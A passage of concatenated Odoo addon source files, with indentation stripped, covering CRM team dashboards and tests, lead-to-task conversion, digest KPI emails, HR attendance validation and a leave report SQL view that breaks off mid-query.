action['help'] = _("""<p class='o_view_nocontent_smiling_face'>Add new opportunities</p><p>
Looks like you are not a member of a Sales Team. You should add yourself
as a member of one of the Sales Team.
</p>""")
if user_team_id:
action['help'] += "<p>As you don't belong to any Sales Team, Odoo opens the first one by default.</p>"
action_context = safe_eval(action['context'], {'uid': self.env.uid})
if user_team_id:
action_context['default_team_id'] = user_team_id
action['context'] = action_context
return action
def _compute_dashboard_button_name(self):
opportunity_teams = self.filtered('use_opportunities')
opportunity_teams.update({'dashboard_button_name': _("Pipeline")})
super(Team, self - opportunity_teams)._compute_dashboard_button_name()
def action_primary_channel_button(self):
if self.use_opportunities:
action = self.env.ref('crm.crm_case_form_view_salesteams_opportunity').read()[0]
return action
return super(Team, self).action_primary_channel_button()
def _graph_get_dates(self, today):
""" return a coherent start and end date for the dashboard graph according to the graph settings.
"""
if self.dashboard_graph_model == 'crm.lead':
if self.dashboard_graph_group == 'month':
start_date = today.replace(day=1)
elif self.dashboard_graph_group == 'week':
start_date = today - relativedelta(days=today.isocalendar()[2] - 1)
else:
start_date = today
if self.dashboard_graph_period == 'week':
end_date = today + relativedelta(weeks=1)
elif self.dashboard_graph_period == 'year':
end_date = today + relativedelta(years=1)
else:
end_date = today + relativedelta(months=1)
# we take the end of the preceding month/week/day if we group by month/week/day
# (to avoid having twice the same month/week/day from different years/month/week)
if self.dashboard_graph_group == 'month':
end_date = end_date.replace(day=1) - relativedelta(days=1)
elif self.dashboard_graph_group == 'week':
end_date -= relativedelta(days=end_date.isocalendar()[2])
else:
end_date -= relativedelta(days=1)
return [start_date, end_date]
return super(Team, self)._graph_get_dates(today)
def _get_graph(self):
graph_datas = super(Team, self)._get_graph()
if self.dashboard_graph_model == 'crm.lead' and self.dashboard_graph_group_pipeline == 'stage':
stage_ids = [d['label'] for d in graph_datas[0]['values'] if d['label'] is not None]
stage_data = self.env['crm.stage'].browse(stage_ids).read(['sequence', 'name'])
stage_data = {d['id']: {'name': d['name'], 'sequence': d['sequence']} for d in stage_data}
# use "Undefined" stage for unset stage records
stage_data[None] = {'name': _('Undefined'), 'sequence': -1}
graph_datas[0]['values'] = sorted(graph_datas[0]['values'], key=lambda el: stage_data[el['label']]['sequence'])
for gdata in graph_datas[0]['values']:
gdata['label'] = stage_data[gdata['label']]['name']
return graph_datas
def _graph_date_column(self):
if self.dashboard_graph_model == 'crm.lead':
return 'date_deadline'
return super(Team, self)._graph_date_column()
def _graph_x_query(self):
if self.dashboard_graph_model == 'crm.lead' and self.dashboard_graph_group_pipeline == 'stage':
return 'stage_id'
return super(Team, self)._graph_x_query()
def _graph_y_query(self):
if self.dashboard_graph_model == 'crm.lead':
return 'SUM(expected_revenue)'
return super(Team, self)._graph_y_query()
def _graph_title_and_key(self):
if self.dashboard_graph_model == 'crm.lead':
return ['', _('Pipeline: Expected Revenue')] # no more title
return super(Team, self)._graph_title_and_key()
```
#### File: crm/models/res_partner.py
```python
from odoo import api, fields, models
class Partner(models.Model):
_inherit = 'res.partner'
team_id = fields.Many2one('crm.team', string='Sales Team', oldname='section_id')
opportunity_ids = fields.One2many('crm.lead', 'partner_id', string='Opportunities', domain=[('type', '=', 'opportunity')])
meeting_ids = fields.Many2many('calendar.event', 'calendar_event_res_partner_rel', 'res_partner_id', 'calendar_event_id', string='Meetings', copy=False)
opportunity_count = fields.Integer("Opportunity", compute='_compute_opportunity_count')
meeting_count = fields.Integer("# Meetings", compute='_compute_meeting_count')
@api.model
def default_get(self, fields):
rec = super(Partner, self).default_get(fields)
active_model = self.env.context.get('active_model')
if active_model == 'crm.lead':
lead = self.env[active_model].browse(self.env.context.get('active_id')).exists()
if lead:
rec.update(
phone=lead.phone,
mobile=lead.mobile,
function=lead.function,
title=lead.title.id,
website=lead.website,
street=lead.street,
street2=lead.street2,
city=lead.city,
state_id=lead.state_id.id,
country_id=lead.country_id.id,
zip=lead.zip,
)
return rec
@api.multi
def _compute_opportunity_count(self):
for partner in self:
operator = 'child_of' if partner.is_company else '=' # the opportunity count should counts the opportunities of this company and all its contacts
partner.opportunity_count = self.env['crm.lead'].search_count([('partner_id', operator, partner.id), ('type', '=', 'opportunity')])
@api.multi
def _compute_meeting_count(self):
for partner in self:
partner.meeting_count = len(partner.meeting_ids)
@api.multi
def schedule_meeting(self):
partner_ids = self.ids
partner_ids.append(self.env.user.partner_id.id)
action = self.env.ref('calendar.action_calendar_event').read()[0]
action['context'] = {
'search_default_partner_ids': self._context['partner_name'],
'default_partner_ids': partner_ids,
}
return action
```
#### File: crm_project/wizard/crm_lead_convert2task.py
```python
from odoo import api, fields, models
class CrmLeadConvert2Task(models.TransientModel):
""" wizard to convert a Lead into a Project task and move the Mail Thread """
_name = "crm.lead.convert2task"
_inherit = 'crm.partner.binding'
_description = 'Lead convert to Task'
@api.model
def default_get(self, fields):
result = super(CrmLeadConvert2Task, self).default_get(fields)
lead_id = self.env.context.get('active_id')
if lead_id:
result['lead_id'] = lead_id
return result
lead_id = fields.Many2one('crm.lead', string='Lead', domain=[('type', '=', 'lead')])
project_id = fields.Many2one('project.project', string='Project')
@api.multi
def action_lead_to_project_task(self):
self.ensure_one()
# get the lead to transform
lead = self.lead_id
partner_id = self._find_matching_partner()
if not partner_id and (lead.partner_name or lead.contact_name):
partner_id = lead.handle_partner_assignation()[lead.id]
# create new project.task
vals = {
"name": lead.name,
"description": lead.description,
"email_from": lead.email_from,
"project_id": self.project_id.id,
"partner_id": partner_id,
"user_id": None
}
task = self.env['project.task'].create(vals)
# move the mail thread
lead.message_change_thread(task)
# move attachments
attachments = self.env['ir.attachment'].search([('res_model', '=', 'crm.lead'), ('res_id', '=', lead.id)])
attachments.write({'res_model': 'project.task', 'res_id': task.id})
# archive the lead
lead.write({'active': False})
# return the action to go to the form view of the new Task
view = self.env.ref('project.view_task_form2')
return {
'name': 'Task created',
'view_type': 'form',
'view_mode': 'form',
'view_id': view.id,
'res_model': 'project.task',
'type': 'ir.actions.act_window',
'res_id': task.id,
'context': self.env.context
}
```
#### File: crm/tests/test_crm_activity.py
```python
from .common import TestCrmCases
from odoo import fields
from datetime import datetime, timedelta
class TestCrmMailActivity(TestCrmCases):
def setUp(self):
super(TestCrmMailActivity, self).setUp()
# Set up activities
lead_model_id = self.env['ir.model']._get('crm.lead').id
ActivityType = self.env['mail.activity.type']
self.activity3 = ActivityType.create({
'name': 'Celebrate the sale',
'delay_count': 3,
'summary': 'ACT 3 : Beers for everyone because I am a good salesman !',
'res_model_id': lead_model_id,
})
self.activity2 = ActivityType.create({
'name': 'Call for Demo',
'delay_count': 6,
'summary': 'ACT 2 : I want to show you my ERP !',
'res_model_id': lead_model_id,
})
self.activity1 = ActivityType.create({
'name': 'Initial Contact',
'delay_count': 5,
'summary': 'ACT 1 : Presentation, barbecue, ... ',
'res_model_id': lead_model_id,
})
# I create an opportunity, as salesman
self.partner_client = self.env.ref("base.res_partner_1")
self.lead = self.env['crm.lead'].sudo(self.crm_salesman.id).create({
'name': '<NAME>',
'type': 'opportunity',
'partner_id': self.partner_client.id,
'team_id': self.env.ref("sales_team.team_sales_department").id,
'user_id': self.crm_salesman.id,
})
def test_crm_activity_recipients(self):
""" This test case checks
- no internal subtype followed by client
- activity subtype are not default ones
- only activity followers are recipients when this kind of activity is logged
"""
# Activity I'm going to log
activity = self.activity2
# Add explicitly a the client as follower
self.lead.message_subscribe([self.partner_client.id])
# Check the client is not follower of any internal subtype
internal_subtypes = self.lead.message_follower_ids.filtered(lambda fol: fol.partner_id == self.partner_client).mapped('subtype_ids').filtered(lambda subtype: subtype.internal)
self.assertFalse(internal_subtypes)
# Add sale manager as follower of default subtypes
self.lead.message_subscribe([self.crm_salemanager.partner_id.id], subtype_ids=[self.env.ref('mail.mt_activities').id, self.env.ref('mail.mt_comment').id])
activity = self.env['mail.activity'].sudo(self.crm_salesman.id).create({
'activity_type_id': self.activity1.id,
'note': 'Content of the activity to log',
'res_id': self.lead.id,
'res_model_id': self.env.ref('crm.model_crm_lead').id,
})
activity._onchange_activity_type_id()
self.assertEqual(self.lead.activity_type_id, self.activity1)
self.assertEqual(self.lead.activity_summary, self.activity1.summary)
# self.assertEqual(self.lead.activity_date_deadline, self.activity1.summary)
# mark as done, check lead and posted message
activity.action_done()
self.assertFalse(self.lead.activity_type_id.id)
self.assertFalse(self.lead.activity_ids)
activity_message = self.lead.message_ids[0]
self.assertEqual(activity_message.needaction_partner_ids, self.crm_salemanager.partner_id)
self.assertEqual(activity_message.subtype_id, self.env.ref('mail.mt_activities'))
def test_crm_activity_next_action(self):
""" This test case set the next activity on a lead, log another, and schedule a third. """
# Add the next activity (like we set it from a form view)
lead_model_id = self.env['ir.model']._get('crm.lead').id
activity = self.env['mail.activity'].sudo(self.crm_salesman.id).create({
'activity_type_id': self.activity1.id,
'summary': 'My Own Summary',
'res_id': self.lead.id,
'res_model_id': lead_model_id,
})
activity._onchange_activity_type_id()
# Check the next activity is correct
self.assertEqual(self.lead.activity_summary, activity.summary)
self.assertEqual(self.lead.activity_type_id, activity.activity_type_id)
# self.assertEqual(fields.Datetime.from_string(self.lead.activity_date_deadline), datetime.now() + timedelta(days=activity.activity_type_id.days))
activity.write({
'activity_type_id': self.activity2.id,
'summary': '',
'note': 'Content of the activity to log',
})
activity._onchange_activity_type_id()
self.assertEqual(self.lead.activity_summary, activity.activity_type_id.summary)
self.assertEqual(self.lead.activity_type_id, activity.activity_type_id)
# self.assertEqual(fields.Datetime.from_string(self.lead.activity_date_deadline), datetime.now() + timedelta(days=activity.activity_type_id.days))
activity.action_done()
# Check the next activity on the lead has been removed
self.assertFalse(self.lead.activity_type_id)
```
#### File: crm/tests/test_new_lead_notification.py
```python
from .common import TestCrmCases
class NewLeadNotification(TestCrmCases):
def test_new_lead_notification(self):
""" Test newly create leads like from the website. People and channels
subscribed to the Sales Team shoud be notified. """
# subscribe a partner and a channel to the Sales Team with new lead subtype
channel_listen = self.env['mail.channel'].create({'name': 'Listener'})
sales_team_1 = self.env['crm.team'].create({
'name': 'Test Sales Team',
'alias_name': 'test_sales_team',
})
subtype = self.env.ref("crm.mt_salesteam_lead")
sales_team_1.message_subscribe(partner_ids=[self.crm_salesman.partner_id.id], channel_ids=[channel_listen.id], subtype_ids=[subtype.id])
# Imitate what happens in the controller when somebody creates a new
# lead from the website form
lead = self.env["crm.lead"].with_context(mail_create_nosubscribe=True).sudo().create({
"contact_name": "Somebody",
"description": "Some question",
"email_from": "<EMAIL>",
"name": "<NAME>",
"partner_name": "Some company",
"team_id": sales_team_1.id,
"phone": "+0000000000"
})
# partner and channel should be auto subscribed
self.assertIn(self.crm_salesman.partner_id, lead.message_partner_ids)
self.assertIn(channel_listen, lead.message_channel_ids)
msg = lead.message_ids[0]
self.assertIn(self.crm_salesman.partner_id, msg.needaction_partner_ids)
self.assertIn(channel_listen, msg.channel_ids)
# The user should have a new unread message
lead_user = lead.sudo(self.crm_salesman)
self.assertTrue(lead_user.message_needaction)
def test_new_lead_from_email_multicompany(self):
company0 = self.env.user.company_id
company1 = self.env['res.company'].create({'name': 'new_company'})
self.env.user.write({
'company_ids': [(4, company0.id, False), (4, company1.id, False)],
})
crm_team_model = self.env['ir.model'].search([('model', '=', 'crm.team')])
crm_lead_model = self.env['ir.model'].search([('model', '=', 'crm.lead')])
self.env["ir.config_parameter"].sudo().set_param("mail.catchall.domain", 'aqualung.com')
crm_team0 = self.env['crm.team'].create({
'name': 'crm team 0',
'company_id': company0.id,
})
crm_team1 = self.env['crm.team'].create({
'name': 'crm team 1',
'company_id': company1.id,
})
mail_alias0 = self.env['mail.alias'].create({
'alias_name': 'sale_team_0',
'alias_model_id': crm_lead_model.id,
'alias_parent_model_id': crm_team_model.id,
'alias_parent_thread_id': crm_team0.id,
'alias_defaults': "{'type': 'opportunity', 'team_id': %s}" % crm_team0.id,
})
mail_alias1 = self.env['mail.alias'].create({
'alias_name': 'sale_team_1',
'alias_model_id': crm_lead_model.id,
'alias_parent_model_id': crm_team_model.id,
'alias_parent_thread_id': crm_team1.id,
'alias_defaults': "{'type': 'opportunity', 'team_id': %s}" % crm_team1.id,
})
crm_team0.write({'alias_id': mail_alias0.id})
crm_team1.write({'alias_id': mail_alias1.id})
new_message0 = """MIME-Version: 1.0
Date: Thu, 27 Dec 2018 16:27:45 +0100
Message-ID: blablabla0
Subject: sale team 0 in company 0
From: A client <<EMAIL>>
To: <EMAIL>
Content-Type: multipart/alternative; boundary="000000000000a47519057e029630"
--000000000000a47519057e029630
Content-Type: text/plain; charset="UTF-8"
--000000000000a47519057e029630
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<div>A good message</div>
--000000000000a47519057e029630--
"""
new_message1 = """MIME-Version: 1.0
Date: Thu, 27 Dec 2018 16:27:45 +0100
Message-ID: blablabla1
Subject: sale team 1 in company 1
From: B client <<EMAIL>>
To: <EMAIL>
Content-Type: multipart/alternative; boundary="000000000000a47519057e029630"
--000000000000a47519057e029630
Content-Type: text/plain; charset="UTF-8"
--000000000000a47519057e029630
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<div>A good message bis</div>
--000000000000a47519057e029630--
"""
crm_lead0_id = self.env['mail.thread'].message_process('crm.lead', new_message0)
crm_lead1_id = self.env['mail.thread'].message_process('crm.lead', new_message1)
crm_lead0 = self.env['crm.lead'].browse(crm_lead0_id)
crm_lead1 = self.env['crm.lead'].browse(crm_lead1_id)
self.assertEqual(crm_lead0.team_id, crm_team0)
self.assertEqual(crm_lead1.team_id, crm_team1)
self.assertEqual(crm_lead0.company_id, company0)
self.assertEqual(crm_lead1.company_id, company1)
```
#### File: addons/decimal_precision/__init__.py
```python
from odoo import api, SUPERUSER_ID
from . import models
def get_precision(application):
def change_digit(cr):
env = api.Environment(cr, SUPERUSER_ID, {})
precision = env['decimal.precision'].precision_get(application)
return 16, precision
return change_digit
```
#### File: delivery/models/res_config_settings.py
```python
from odoo import models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
def set_values(self):
super(ResConfigSettings, self).set_values()
rule = self.env.ref('delivery.delivery_carrier_comp_rule', False)
if rule:
rule.write({'active': not bool(self.company_share_product)})
```
#### File: digest/models/digest.py
```python
import logging
import math
import pytz
from datetime import datetime, date
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, tools
from odoo.addons.base.models.ir_mail_server import MailDeliveryException
from odoo.exceptions import AccessError
from odoo.tools.float_utils import float_round
_logger = logging.getLogger(__name__)
class Digest(models.Model):
_name = 'digest.digest'
_description = 'Digest'
# Digest description
name = fields.Char(string='Name', required=True, translate=True)
user_ids = fields.Many2many('res.users', string='Recipients', domain="[('share', '=', False)]")
periodicity = fields.Selection([('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly', 'Quarterly')],
string='Periodicity', default='weekly', required=True)
next_run_date = fields.Date(string='Next Send Date')
template_id = fields.Many2one('mail.template', string='Email Template',
domain="[('model','=','digest.digest')]",
default=lambda self: self.env.ref('digest.digest_mail_template'),
required=True)
currency_id = fields.Many2one(related="company_id.currency_id", string='Currency', readonly=False)
company_id = fields.Many2one('res.company', string='Company', default=lambda self: self.env.user.company_id.id)
available_fields = fields.Char(compute='_compute_available_fields')
is_subscribed = fields.Boolean('Is user subscribed', compute='_compute_is_subscribed')
state = fields.Selection([('activated', 'Activated'), ('deactivated', 'Deactivated')], string='Status', readonly=True, default='activated')
# First base-related KPIs
kpi_res_users_connected = fields.Boolean('Connected Users')
kpi_res_users_connected_value = fields.Integer(compute='_compute_kpi_res_users_connected_value')
kpi_mail_message_total = fields.Boolean('Messages')
kpi_mail_message_total_value = fields.Integer(compute='_compute_kpi_mail_message_total_value')
def _compute_is_subscribed(self):
for digest in self:
digest.is_subscribed = self.env.user in digest.user_ids
def _compute_available_fields(self):
for digest in self:
kpis_values_fields = []
for field_name, field in digest._fields.items():
if field.type == 'boolean' and field_name.startswith(('kpi_', 'x_kpi_', 'x_studio_kpi_')) and digest[field_name]:
kpis_values_fields += [field_name + '_value']
digest.available_fields = ', '.join(kpis_values_fields)
def _get_kpi_compute_parameters(self):
return fields.Date.to_string(self._context.get('start_date')), fields.Date.to_string(self._context.get('end_date')), self._context.get('company')
def _compute_kpi_res_users_connected_value(self):
for record in self:
start, end, company = record._get_kpi_compute_parameters()
user_connected = self.env['res.users'].search_count([('company_id', '=', company.id), ('login_date', '>=', start), ('login_date', '<', end)])
record.kpi_res_users_connected_value = user_connected
def _compute_kpi_mail_message_total_value(self):
for record in self:
start, end, company = record._get_kpi_compute_parameters()
total_messages = self.env['mail.message'].search_count([('create_date', '>=',start), ('create_date', '<', end)])
record.kpi_mail_message_total_value = total_messages
@api.onchange('periodicity')
def _onchange_periodicity(self):
self.next_run_date = self._get_next_run_date()
@api.model
def create(self, vals):
vals['next_run_date'] = date.today() + relativedelta(days=3)
return super(Digest, self).create(vals)
@api.multi
def action_subscribe(self):
if self.env.user not in self.user_ids:
self.sudo().user_ids |= self.env.user
@api.multi
def action_unsubcribe(self):
if self.env.user in self.user_ids:
self.sudo().user_ids -= self.env.user
@api.multi
def action_activate(self):
self.state = 'activated'
@api.multi
def action_deactivate(self):
self.state = 'deactivated'
def action_send(self):
for digest in self:
for user in digest.user_ids:
subject = '%s: %s' % (user.company_id.name, digest.name)
digest.template_id.with_context(user=user).send_mail(digest.id, force_send=True, raise_exception=True, email_values={'email_to': user.email, 'subject': subject})
digest.next_run_date = digest._get_next_run_date()
def compute_kpis(self, company, user):
self.ensure_one()
res = {}
for tf_name, tf in self._compute_timeframes(company).items():
digest = self.with_context(start_date=tf[0][0], end_date=tf[0][1], company=company).sudo(user.id)
previous_digest = self.with_context(start_date=tf[1][0], end_date=tf[1][1], company=company).sudo(user.id)
kpis = {}
for field_name, field in self._fields.items():
if field.type == 'boolean' and field_name.startswith(('kpi_', 'x_kpi_', 'x_studio_kpi_')) and self[field_name]:
try:
compute_value = digest[field_name + '_value']
previous_value = previous_digest[field_name + '_value']
except AccessError: # no access rights -> just skip that digest details from that user's digest email
continue
margin = self._get_margin_value(compute_value, previous_value)
if self._fields[field_name+'_value'].type == 'monetary':
converted_amount = self._format_human_readable_amount(compute_value)
kpis.update({field_name: {field_name: self._format_currency_amount(converted_amount, company.currency_id), 'margin': margin}})
else:
kpis.update({field_name: {field_name: compute_value, 'margin': margin}})
res.update({tf_name: kpis})
return res
def compute_tips(self, company, user):
tip = self.env['digest.tip'].search([('user_ids', '!=', user.id), '|', ('group_id', 'in', user.groups_id.ids), ('group_id', '=', False)], limit=1)
if not tip:
return False
tip.user_ids += user
body = tools.html_sanitize(tip.tip_description)
tip_description = self.env['mail.template']._render_template(body, 'digest.tip', self.id)
return tip_description
def compute_kpis_actions(self, company, user):
""" Give an optional action to display in digest email linked to some KPIs.
:return dict: key: kpi name (field name), value: an action that will be
concatenated with /web#action={action}
"""
return {}
def _get_next_run_date(self):
self.ensure_one()
if self.periodicity == 'weekly':
delta = relativedelta(weeks=1)
elif self.periodicity == 'monthly':
delta = relativedelta(months=1)
elif self.periodicity == 'quarterly':
delta = relativedelta(months=3)
return date.today() + delta
def _compute_timeframes(self, company):
now = datetime.utcnow()
# TODO remove hasattr in >=saas-12.1
tz_name = hasattr(company, "resource_calendar_id") and company.resource_calendar_id.tz
if tz_name:
now = pytz.timezone(tz_name).localize(now)
start_date = now.date()
return {
'yesterday': (
(start_date + relativedelta(days=-1), start_date),
(start_date + relativedelta(days=-2), start_date + relativedelta(days=-1))),
'lastweek': (
(start_date + relativedelta(weeks=-1), start_date),
(start_date + relativedelta(weeks=-2), start_date + relativedelta(weeks=-1))),
'lastmonth': (
(start_date + relativedelta(months=-1), start_date),
(start_date + relativedelta(months=-2), start_date + relativedelta(months=-1))),
}
def _get_margin_value(self, value, previous_value=0.0):
margin = 0.0
if (value != previous_value) and (value != 0.0 and previous_value != 0.0):
margin = float_round((float(value-previous_value) / previous_value or 1) * 100, precision_digits=2)
return margin
def _format_currency_amount(self, amount, currency_id):
pre = post = u''
if currency_id.position == 'before':
pre = u'{symbol}\N{NO-BREAK SPACE}'.format(symbol=currency_id.symbol or '')
else:
post = u'\N{NO-BREAK SPACE}{symbol}'.format(symbol=currency_id.symbol or '')
return u'{pre}{0}{post}'.format(amount, pre=pre, post=post)
def _format_human_readable_amount(self, amount, suffix=''):
for unit in ['', 'K', 'M', 'G']:
if abs(amount) < 1000.0:
return "%3.1f%s%s" % (amount, unit, suffix)
amount /= 1000.0
return "%.1f%s%s" % (amount, 'T', suffix)
@api.model
def _cron_send_digest_email(self):
digests = self.search([('next_run_date', '=', fields.Date.today()), ('state', '=', 'activated')])
for digest in digests:
try:
digest.action_send()
except MailDeliveryException as e:
_logger.warning('MailDeliveryException while sending digest %d. Digest is now scheduled for next cron update.')
```
#### File: google_drive/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = "res.config.settings"
google_drive_authorization_code = fields.Char(string='Authorization Code', config_parameter='google_drive_authorization_code')
google_drive_uri = fields.Char(compute='_compute_drive_uri', string='URI', help="The URL to generate the authorization code from Google")
@api.depends('google_drive_authorization_code')
def _compute_drive_uri(self):
google_drive_uri = self.env['google.service']._get_google_token_uri('drive', scope=self.env['google.drive.config'].get_google_scope())
for config in self:
config.google_drive_uri = google_drive_uri
def set_values(self):
params = self.env['ir.config_parameter'].sudo()
authorization_code_before = params.get_param('google_drive_authorization_code')
super(ResConfigSettings, self).set_values()
authorization_code = self.google_drive_authorization_code
if authorization_code != authorization_code_before:
refresh_token = (
self.env['google.service'].generate_refresh_token('drive', authorization_code)
if authorization_code else False
)
params.set_param('google_drive_refresh_token', refresh_token)
```
#### File: hr_attendance/models/hr_attendance.py
```python
from odoo import models, fields, api, exceptions, _
class HrAttendance(models.Model):
_name = "hr.attendance"
_description = "Attendance"
_order = "check_in desc"
def _default_employee(self):
return self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)
employee_id = fields.Many2one('hr.employee', string="Employee", default=_default_employee, required=True, ondelete='cascade', index=True)
department_id = fields.Many2one('hr.department', string="Department", related="employee_id.department_id",
readonly=True)
check_in = fields.Datetime(string="Check In", default=fields.Datetime.now, required=True)
check_out = fields.Datetime(string="Check Out")
worked_hours = fields.Float(string='Worked Hours', compute='_compute_worked_hours', store=True, readonly=True)
@api.multi
def name_get(self):
result = []
for attendance in self:
if not attendance.check_out:
result.append((attendance.id, _("%(empl_name)s from %(check_in)s") % {
'empl_name': attendance.employee_id.name,
'check_in': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_in))),
}))
else:
result.append((attendance.id, _("%(empl_name)s from %(check_in)s to %(check_out)s") % {
'empl_name': attendance.employee_id.name,
'check_in': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_in))),
'check_out': fields.Datetime.to_string(fields.Datetime.context_timestamp(attendance, fields.Datetime.from_string(attendance.check_out))),
}))
return result
@api.depends('check_in', 'check_out')
def _compute_worked_hours(self):
for attendance in self:
if attendance.check_out:
delta = attendance.check_out - attendance.check_in
attendance.worked_hours = delta.total_seconds() / 3600.0
@api.constrains('check_in', 'check_out')
def _check_validity_check_in_check_out(self):
""" verifies if check_in is earlier than check_out. """
for attendance in self:
if attendance.check_in and attendance.check_out:
if attendance.check_out < attendance.check_in:
raise exceptions.ValidationError(_('"Check Out" time cannot be earlier than "Check In" time.'))
@api.constrains('check_in', 'check_out', 'employee_id')
def _check_validity(self):
""" Verifies the validity of the attendance record compared to the others from the same employee.
For the same employee we must have :
* maximum 1 "open" attendance record (without check_out)
* no overlapping time slices with previous employee records
"""
for attendance in self:
# we take the latest attendance before our check_in time and check it doesn't overlap with ours
last_attendance_before_check_in = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_in', '<=', attendance.check_in),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if last_attendance_before_check_in and last_attendance_before_check_in.check_out and last_attendance_before_check_in.check_out > attendance.check_in:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee was already checked in on %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(attendance.check_in))),
})
if not attendance.check_out:
# if our attendance is "open" (no check_out), we verify there is no other "open" attendance
no_check_out_attendances = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_out', '=', False),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if no_check_out_attendances:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee hasn't checked out since %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(no_check_out_attendances.check_in))),
})
else:
# we verify that the latest attendance with check_in time before our check_out time
# is the same as the one before our check_in time computed before, otherwise it overlaps
last_attendance_before_check_out = self.env['hr.attendance'].search([
('employee_id', '=', attendance.employee_id.id),
('check_in', '<', attendance.check_out),
('id', '!=', attendance.id),
], order='check_in desc', limit=1)
if last_attendance_before_check_out and last_attendance_before_check_in != last_attendance_before_check_out:
raise exceptions.ValidationError(_("Cannot create new attendance record for %(empl_name)s, the employee was already checked in on %(datetime)s") % {
'empl_name': attendance.employee_id.name,
'datetime': fields.Datetime.to_string(fields.Datetime.context_timestamp(self, fields.Datetime.from_string(last_attendance_before_check_out.check_in))),
})
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self):
raise exceptions.UserError(_('You cannot duplicate an attendance.'))
```
#### File: hr_expense/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
expense_alias_prefix = fields.Char('Default Alias Name for Expenses')
use_mailgateway = fields.Boolean(string='Let your employees record expenses by email',
config_parameter='hr_expense.use_mailgateway')
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
res.update(
expense_alias_prefix=self.env.ref('hr_expense.mail_alias_expense').alias_name,
)
return res
@api.multi
def set_values(self):
super(ResConfigSettings, self).set_values()
self.env.ref('hr_expense.mail_alias_expense').write({'alias_name': self.expense_alias_prefix})
@api.onchange('use_mailgateway')
def _onchange_use_mailgateway(self):
if not self.use_mailgateway:
self.expense_alias_prefix = False
```
#### File: hr_gamification/models/hr_employee.py
```python
from odoo import api, fields, models
class HrEmployee(models.Model):
_inherit = "hr.employee"
goal_ids = fields.One2many('gamification.goal', string='Employee HR Goals', compute='_compute_employee_goals')
badge_ids = fields.One2many(
'gamification.badge.user', string='Employee Badges', compute='_compute_employee_badges',
help="All employee badges, linked to the employee either directly or through the user"
)
has_badges = fields.Boolean(compute='_compute_employee_badges')
# necessary for correct dependencies of badge_ids and has_badges
direct_badge_ids = fields.One2many(
'gamification.badge.user', 'employee_id',
help="Badges directly linked to the employee")
@api.depends('user_id.goal_ids.challenge_id.category')
def _compute_employee_goals(self):
for employee in self:
employee.goal_ids = self.env['gamification.goal'].search([
('user_id', '=', employee.user_id.id),
('challenge_id.category', '=', 'hr'),
])
@api.depends('direct_badge_ids', 'user_id.badge_ids.employee_id')
def _compute_employee_badges(self):
for employee in self:
badge_ids = self.env['gamification.badge.user'].search([
'|', ('employee_id', '=', employee.id),
'&', ('employee_id', '=', False),
('user_id', '=', employee.user_id.id)
])
employee.has_badges = bool(badge_ids)
employee.badge_ids = badge_ids
class ResUsers(models.Model):
_inherit = 'res.users'
goal_ids = fields.One2many('gamification.goal', 'user_id')
badge_ids = fields.One2many('gamification.badge.user', 'user_id')
```
#### File: hr_holidays/report/hr_leave_report.py
```python
from odoo import api, fields, models, tools
class LeaveReport(models.Model):
_name = "hr.leave.report"
_description = 'Leave Summary / Report'
_auto = False
_order = "date_from DESC, employee_id"
employee_id = fields.Many2one('hr.employee', string="Employee", readonly=True)
name = fields.Char('Description', readonly=True)
number_of_days = fields.Float('Number of Days', readonly=True)
type = fields.Selection([
('allocation', 'Allocation Request'),
('request', 'Leave Request')
], string='Request Type', readonly=True)
department_id = fields.Many2one('hr.department', string='Department', readonly=True)
category_id = fields.Many2one('hr.employee.category', string='Employee Tag', readonly=True)
holiday_status_id = fields.Many2one("hr.leave.type", string="Leave Type", readonly=True)
state = fields.Selection([
('draft', 'To Submit'),
('cancel', 'Cancelled'),
('confirm', 'To Approve'),
('refuse', 'Refused'),
('validate1', 'Second Approval'),
('validate', 'Approved')
], string='Status', readonly=True)
holiday_type = fields.Selection([
('employee', 'By Employee'),
('category', 'By Employee Tag')
], string='Allocation Mode', readonly=True)
date_from = fields.Datetime('Start Date', readonly=True)
date_to = fields.Datetime('End Date', readonly=True)
payslip_status = fields.Boolean('Reported in last payslips', readonly=True)
def init(self):
tools.drop_view_if_exists(self._cr, 'hr_leave_report')
self._cr.execute("""
CREATE or REPLACE view hr_leave_report as (
SELECT row_number() over(ORDER BY leaves.employee_id) as id,
leaves.employee_id as employee_id, leaves.name as name,
leaves.number_of_days as number_of_days, leaves.type as type,
leaves.category_id as category_id, leaves.department_id as department_id,
leaves.holiday_status_id as holiday_status_id, leaves.state as state,
leaves.holiday_type as holiday_type, leaves.date_from as date_from,
leaves.date_to as date_to, leaves.payslip_status as payslip_status
from (select
allocation.employee_id as employee_id,
allocation.name as name,
allocation.number_of_days as number_of_days,
allocation.category_id as category_id,
allocation.department_id as department_id,
allocation.holiday_status_id as holiday_status_id,
allocation.state as state,
allocation.holiday_type,
null as date_from,
null as date_to,
FALSE as payslip_status,
'allocation' as type
from hr_leave_allocation as allocation
union all select
request.employee_id as employee_id,
request.name as name,
(request.number_of_days * -1) as number_of_days,
request.category_id as category_id,
request.department_id as department_id,
